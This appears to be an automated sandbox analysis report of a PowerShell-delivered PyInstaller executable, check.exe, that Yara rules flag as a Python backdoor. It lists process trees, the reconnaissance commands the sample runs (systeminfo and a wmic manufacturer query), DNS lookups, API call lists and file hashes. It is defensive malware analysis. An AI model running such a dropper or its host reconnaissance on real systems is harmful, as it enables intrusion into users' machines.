Dec 10, 2024 17:10:36.218789101 CET	192.168.2.6	1.1.1.1	0xe10a	Standard query (0)	nodejs.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 10, 2024 17:10:36.357424974 CET	1.1.1.1	192.168.2.6	0xe10a	No error (0)	nodejs.org		104.20.22.46	A (IP address)	IN (0x0001)	false
Dec 10, 2024 17:10:36.357424974 CET	1.1.1.1	192.168.2.6	0xe10a	No error (0)	nodejs.org		104.20.23.46	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	11:09:59
Start date:	10/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:09:59
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:10:19
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe"
Imagebase:	0x7ff6d9230000
File size:	38'755'410 bytes
MD5 hash:	F17797CAAB0F1CB8D5813853AAD786CA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:10:25
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe"
Imagebase:	0x7ff6d9230000
File size:	38'755'410 bytes
MD5 hash:	F17797CAAB0F1CB8D5813853AAD786CA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PythonBackDoor_1, Description: Yara detected Python BackDoor, Source: 00000005.00000003.2373391380.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PythonBackDoor_1, Description: Yara detected Python BackDoor, Source: 00000005.00000003.2372124861.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PythonBackDoor_1, Description: Yara detected Python BackDoor, Source: 00000005.00000003.2413685847.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PythonBackDoor_1, Description: Yara detected Python BackDoor, Source: 00000005.00000002.2580123752.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PythonBackDoor_1, Description: Yara detected Python BackDoor, Source: 00000005.00000003.2375173777.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PythonBackDoor_1, Description: Yara detected Python BackDoor, Source: 00000005.00000003.2373135465.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PythonBackDoor_1, Description: Yara detected Python BackDoor, Source: 00000005.00000003.2372540922.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PythonBackDoor_1, Description: Yara detected Python BackDoor, Source: 00000005.00000003.2371318257.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PythonBackDoor_1, Description: Yara detected Python BackDoor, Source: 00000005.00000003.2409464114.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PythonBackDoor_1, Description: Yara detected Python BackDoor, Source: 00000005.00000003.2366082675.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:10:28
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe"
Imagebase:	0x7ff6d9230000
File size:	38'755'410 bytes
MD5 hash:	F17797CAAB0F1CB8D5813853AAD786CA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:10:32
Start date:	10/12/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff75e6d0000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	11:10:32
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	11:10:33
Start date:	10/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Imagebase:	0x7ff7d9480000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	11:10:33
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	11:10:33
Start date:	10/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic computersystem get manufacturer
Imagebase:	0x7ff61dfa0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	11:10:38
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe"
Imagebase:	0x7ff6d9230000
File size:	38'755'410 bytes
MD5 hash:	F17797CAAB0F1CB8D5813853AAD786CA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	11:10:38
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe"
Imagebase:	0x7ff6d9230000
File size:	38'755'410 bytes
MD5 hash:	F17797CAAB0F1CB8D5813853AAD786CA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PythonBackDoor_1, Description: Yara detected Python BackDoor, Source: 0000000F.00000002.2669527004.0000026A5D2EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PythonBackDoor_1, Description: Yara detected Python BackDoor, Source: 0000000F.00000003.2511360407.0000026A5D2EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PythonBackDoor_1, Description: Yara detected Python BackDoor, Source: 0000000F.00000003.2514741101.0000026A5D2EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	11:10:39
Start date:	10/12/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 1008 -s 940
Imagebase:	0x7ff7692b0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	11:10:46
Start date:	10/12/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff75e6d0000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	11:10:46
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	11:10:47
Start date:	10/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Imagebase:	0x7ff7d9480000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 2960, Parent PID: 1512

General

Target ID:	22
Start time:	11:10:47
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	11:10:47
Start date:	10/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic computersystem get manufacturer
Imagebase:	0x7ff61dfa0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	11:10:49
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe"
Imagebase:	0x7ff6d9230000
File size:	38'755'410 bytes
MD5 hash:	F17797CAAB0F1CB8D5813853AAD786CA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PythonBackDoor_1, Description: Yara detected Python BackDoor, Source: 00000018.00000002.2733954233.0000025DEA117000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	11:10:51
Start date:	10/12/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 6704 -s 976
Imagebase:	0x7ff7692b0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	11:10:55
Start date:	10/12/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff75e6d0000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	11:10:55
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	11:10:56
Start date:	10/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Imagebase:	0x7ff7d9480000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	11:10:56
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	11:10:56
Start date:	10/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic computersystem get manufacturer
Imagebase:	0x7ff61dfa0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	11:10:59
Start date:	10/12/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 6724 -s 996
Imagebase:	0x7ff7692b0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20%
Total number of Nodes:	2000
Total number of Limit Nodes:	37

Executed Functions

Function 00007FF6D92389E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257
synchronizationwindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6D9239390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6D92345F4,00000000,00007FF6D9231985), ref: 00007FF6D92393C9

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF6D9233F7F), ref: 00007FF6D9238A3B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF6D9233F7F), ref: 00007FF6D9238A56

Part of subcall function 00007FF6D924A47C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D924A490

Part of subcall function 00007FF6D924871C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9248783

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF6D9233F7F), ref: 00007FF6D9238AE6
CreateProcessW.KERNELBASE ref: 00007FF6D9238B1E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6D9233F7F), ref: 00007FF6D9238B28

Part of subcall function 00007FF6D9232C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6D9233706,?,00007FF6D9233804), ref: 00007FF6D9232C9E
Part of subcall function 00007FF6D9232C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6D9233706,?,00007FF6D9233804), ref: 00007FF6D9232D63
Part of subcall function 00007FF6D9232C50: MessageBoxW.USER32 ref: 00007FF6D9232D99

RegisterClassW.USER32 ref: 00007FF6D9238B80
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6D9233F7F), ref: 00007FF6D9238B8B
CreateWindowExW.USER32 ref: 00007FF6D9238BD5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6D9233F7F), ref: 00007FF6D9238BE7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6D9233F7F), ref: 00007FF6D9238C02
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6D9233F7F), ref: 00007FF6D9238C15
PeekMessageW.USER32 ref: 00007FF6D9238C39
TranslateMessage.USER32 ref: 00007FF6D9238C47
DispatchMessageW.USER32(?,FFFFFFFF,00007FF6D9233F7F), ref: 00007FF6D9238C51
PeekMessageW.USER32 ref: 00007FF6D9238C6C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6D9233F7F), ref: 00007FF6D9238C7E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6D9233F7F), ref: 00007FF6D9238C99
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF6D9233F7F), ref: 00007FF6D9238CAF
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6D9233F7F), ref: 00007FF6D9238CB9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6D9233F7F), ref: 00007FF6D9238CC7
DestroyWindow.USER32(?,FFFFFFFF,00007FF6D9233F7F), ref: 00007FF6D9238E04
GetExitCodeProcess.KERNELBASE ref: 00007FF6D9238E19
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF6D9233F7F), ref: 00007FF6D9238E22
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF6D9233F7F), ref: 00007FF6D9238E2F

Strings

PyInstallerOnefileHiddenWindow, xrefs: 00007FF6D9238B54
CreateProcessW, xrefs: 00007FF6D9238B37
PyInstaller Onefile Hidden Window, xrefs: 00007FF6D9238B95
Failed to create child process!, xrefs: 00007FF6D9238B30

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
Instruction ID: 3a13761875149cd00dff1137348a912b62fc4091c5bf37a1b5211e9d45b95088
Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
Instruction Fuzzy Hash: 2AD18032A28A8686FB509F74E9542BE3760FF84B58F404236DA5D97AA8DF3CD564C700

Function 00007FF6D9231000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 511
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

MEI, xrefs: 00007FF6D9233933
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF6D9233EBB
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF6D9233E0A
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF6D9233D12
pyi-contents-directory, xrefs: 00007FF6D9233B8D
pyi-runtime-tmpdir, xrefs: 00007FF6D9233B68
_PYI_ARCHIVE_FILE, xrefs: 00007FF6D92338D2, 00007FF6D92339FF
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF6D9233EA6
Could not create temporary directory!, xrefs: 00007FF6D9233CBF
Failed to start splash screen!, xrefs: 00007FF6D9233ED4
pyi-disable-windowed-traceback, xrefs: 00007FF6D9233BB2
Failed to convert DLL search path!, xrefs: 00007FF6D9233DDC
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF6D9233882, 00007FF6D92338AF
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF6D9233BE8
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF6D9233C61
Py_GIL_DISABLED, xrefs: 00007FF6D9233AF4
pkg, xrefs: 00007FF6D92339BE
VCRUNTIME140.dll, xrefs: 00007FF6D9233DB1
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF6D9233A0B, 00007FF6D9233CD4, 00007FF6D9233F6B
Failed to remove temporary directory: %s, xrefs: 00007FF6D9233FCF
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF6D9233B32
Failed to load splash screen resources!, xrefs: 00007FF6D9233E85
_PYI_SPLASH_IPC, xrefs: 00007FF6D9233A23, 00007FF6D9233EF5
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF6D9233971
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF6D92339DE
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF6D9233A17, 00007FF6D9233A2F, 00007FF6D9233A9B
pyi-python-flag, xrefs: 00007FF6D9233AD6
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF6D9233D35

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
API String ID: 2776309574-4232158417
Opcode ID: 9de477ae995940a39e23314e20718922418974b9c8241bfba060ee61ec72f349
Instruction ID: 0264d6f59cb271002a02b51ade3f4e7c1abb7c7c177db248fa25a21af4a1f337
Opcode Fuzzy Hash: 9de477ae995940a39e23314e20718922418974b9c8241bfba060ee61ec72f349
Instruction Fuzzy Hash: 4D327D21E2C68291FB59EF3596553BD26A1AF54780F84403BDA5DC72E6EF2CE678C300

Function 00007FF6D9255C00 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF6D9255C45

Part of subcall function 00007FF6D9255598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D92555AC

Part of subcall function 00007FF6D924A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6D9252D22,?,?,?,00007FF6D9252D5F,?,?,00000000,00007FF6D9253225,?,?,?,00007FF6D9253157), ref: 00007FF6D924A95E
Part of subcall function 00007FF6D924A948: GetLastError.KERNEL32(?,?,?,00007FF6D9252D22,?,?,?,00007FF6D9252D5F,?,?,00000000,00007FF6D9253225,?,?,?,00007FF6D9253157), ref: 00007FF6D924A968

Part of subcall function 00007FF6D924A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6D924A8DF,?,?,?,?,?,00007FF6D924A7CA), ref: 00007FF6D924A909
Part of subcall function 00007FF6D924A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6D924A8DF,?,?,?,?,?,00007FF6D924A7CA), ref: 00007FF6D924A92E

_get_daylight.LIBCMT ref: 00007FF6D9255C34

Part of subcall function 00007FF6D92555F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D925560C

_get_daylight.LIBCMT ref: 00007FF6D9255EAA
_get_daylight.LIBCMT ref: 00007FF6D9255EBB
_get_daylight.LIBCMT ref: 00007FF6D9255ECC
GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6D925610C), ref: 00007FF6D9255EF3

Strings

Eastern Summer Time, xrefs: 00007FF6D9255FB1
Eastern Standard Time, xrefs: 00007FF6D9255F99

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 4070488512-239921721
Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
Instruction ID: b4ef92436f0ac965fa868bb2f47b8962a6c4775db5dd911bda89b8b3c01b19ec
Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
Instruction Fuzzy Hash: 00D1C222E2824286FBA0AF61DA415BD6361FF94794F448137EA0DC7A99DF3CE861C740

Function 00007FF6D9256964 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6D9256698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D92566D9
Part of subcall function 00007FF6D9256698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9256757
Part of subcall function 00007FF6D9256698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D92567A8

CreateFileW.KERNELBASE ref: 00007FF6D9256A6A
CreateFileW.KERNEL32 ref: 00007FF6D9256ABA
GetLastError.KERNEL32 ref: 00007FF6D9256AEA
GetFileType.KERNELBASE ref: 00007FF6D9256AFF
GetLastError.KERNEL32 ref: 00007FF6D9256B09
CloseHandle.KERNEL32 ref: 00007FF6D9256B3C
CloseHandle.KERNEL32 ref: 00007FF6D9256C9F
CreateFileW.KERNEL32 ref: 00007FF6D9256CD4
GetLastError.KERNEL32 ref: 00007FF6D9256CE3

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

